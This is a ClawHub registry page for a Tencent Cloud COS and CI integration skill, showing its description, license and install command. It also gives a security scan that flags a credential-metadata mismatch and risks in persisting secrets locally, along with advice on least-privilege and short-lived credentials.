ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Tencent Cloud COS

v1.1.3

腾讯云对象存储(COS)和数据万象(CI)集成技能。覆盖文件存储管理、AI处理和知识库三大核心场景。 存储场景:上传文件到云端、下载云端文件、批量管理存储桶文件、获取文件签名链接分享、查看文件元信息。 图片处理场景:图片质量评估打分、AI超分辨率放大、AI智能裁剪、二维码/条形码识别、添加文字水印、获取图片EXI...

0· 1.6k·0 current·0 all-time
byShawnmZhang@shawnminh·duplicate of @shawnminh/tencent-cos-skill
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
Crypto
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
high confidence
!
Purpose & Capability
The SKILL.md, scripts, and included Node.js SDK are consistent with a Tencent COS + CI + MetaInsight skill and legitimately require COS credentials and Region/Bucket. However the top-level registry 'Requirements' in the provided summary claims 'Required env vars: none' and 'Primary credential: none' — which contradicts the SKILL.md and cos_node.mjs that require TENCENT_COS_SECRET_ID and TENCENT_COS_SECRET_KEY (and optionally TENCENT_COS_TOKEN). This metadata mismatch is an incoherence that should be resolved.
Instruction Scope
The runtime instructions and scripts restrict actions to COS/CI operations (upload/download/list/sign, CI jobs, MetaInsight requests) and to local setup tasks. The setup.sh and cos_node.mjs do read/write local .env/.env.enc and may run node scripts for verification, but they do not call external endpoints outside Tencent Cloud domains. They request credentials only for the stated cloud operations.
Install Mechanism
Install spec is a single npm dependency (cos-nodejs-sdk-v5) installed locally via npm — a proportionate and expected dependency for this functionality. No suspicious remote archive downloads or unknown hosts are used.
!
Credentials
The skill legitimately needs cloud credentials (SecretId/SecretKey and optional Token) and config (Region, Bucket). That is proportionate. However the registry summary incorrectly indicates no required env vars. Also the installer provides an optional --persist that writes sensitive credentials to a local .env (and can create .env.enc). While file permissions and .gitignore handling are implemented, any persisted secret increases attack surface; the skill encourages ephemeral STS credentials but will accept permanent keys.
Persistence & Privilege
The skill does not request elevated platform privileges (always:false). It may write project-local files (.env, .env.enc) and append .env to .gitignore. .env.enc uses AES-256-GCM with a key derived from hostname+username+project path; this ties the encrypted file to the environment but is not a substitute for proper secret management. The script also runs a node verification call during setup which will exercise the provided credentials against Tencent APIs (expected behavior).
What to consider before installing
This package mostly does what it claims (Tencent COS + CI operations) but there are a few actionable things to verify before installing or giving credentials: - Metadata mismatch: the registry summary says 'no required env vars' but the skill and scripts require TENCENT_COS_SECRET_ID and TENCENT_COS_SECRET_KEY (and optionally TENCENT_COS_TOKEN). Ask the publisher to correct the metadata if you care about declared permissions. - Prefer ephemeral STS tokens: use temporary STS credentials (Token) rather than permanent root/owner keys. The SKILL.md itself recommends sub-account least-privilege keys and STS — follow that. - Avoid persisting secrets: run setup with --from-env (no --persist) so credentials remain in your shell session only. If you must persist, inspect .env and .env.enc afterwards and store them securely. - Inspect files locally: the repository includes scripts/setup.sh and scripts/cos_node.mjs; review these files (you already have them) and confirm the endpoints called are Tencent COS/CI domains. The code provided does not call unknown third-party endpoints. - Confirm npm package provenance: cos-nodejs-sdk-v5 is the expected SDK; if you rely on supply-chain security, validate the package checksum or install in an isolated environment. - Be aware of .env.enc fallback: cos_node.mjs will attempt to decrypt .env.enc and fall back to .env if decryption fails; if you share both files in a repo, the fallback behavior could expose creds. Keep .env/.env.enc out of shared repos. If you want extra assurance, run the skill in an isolated container or VM, use a least-privilege COS sub-account, and test with short-lived STS credentials first.

Like a lobster shell, security has layers — review code before you run it.

latestvk974mm4ab73779g2cswc4hexnh84cjq5

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Runtime requirements

☁️ Clawdis
ConfigRegion, Bucket

Install

Install COS Node.js SDKnpm i -g cos-nodejs-sdk-v5

Comments